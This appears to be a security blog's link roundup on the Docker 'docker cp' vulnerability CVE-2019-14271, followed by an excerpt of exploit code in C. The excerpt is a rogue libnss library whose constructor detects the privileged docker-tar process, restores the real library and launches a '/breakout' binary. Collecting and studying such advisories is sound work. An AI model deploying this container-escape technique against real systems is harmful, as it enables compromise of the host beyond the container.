【News】
◆ PoC released for known "Docker" vulnerability - impact is large, check your update status (Security NEXT, 2019/11/22)
http://www.security-next.com/110066
【Blog】
◆ Docker fixes CVE-2019-14271, the most severe cp command vulnerability to date (UNIT42 (Palo Alto), 2019/11/19)
https://unit42.paloaltonetworks.jp/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/
⇒ https://malware-log.hatenablog.com/entry/2019/11/19/000000_4
◆ CVE-2019-14271: Proof of concept released that exploits the Docker Copy (docker cp) vulnerability (Tenable, 2019/11/21)
https://jp.tenable.com/blog/cve-2019-14271-proof-of-concept-for-docker-copy-docker-cp-vulnerability-released
⇒ https://malware-log.hatenablog.com/entry/2019/11/21/000000_4
【Related summary articles】
◆ Docker (summary)
https://malware-log.hatenablog.com/entry/Docker
【Exploit Code】
#include ...

#define ORIGINAL_LIBNSS "/original_libnss_files.so.2"
#define LIBNSS_PATH "/lib/x86_64-linux-gnu/libnss_files.so.2"

bool is_priviliged();

__attribute__ ((constructor)) void run_at_link(void)
{
    char * argv_break[2];

    if (!is_priviliged())
        return;

    rename(ORIGINAL_LIBNSS, LIBNSS_PATH);
    fprintf(log_fp, "switched back to the original libnss_file.so");

    if (!fork()) {
        // Child runs breakout
        argv_break[0] = strdup("/breakout");
        argv_break[1] = NULL;
        execve("/breakout", argv_break, NULL);
    } else
        wait(NULL); // Wait for child

    return;
}

bool is_priviliged()
{
    FILE * proc_file = fopen("/proc/self/exe", "r");
    if (proc_file != NULL) {
        fclose(proc_file);
        return false; // can open so /proc exists, not privileged
    }
    return true; // we're running in the context of docker-tar
}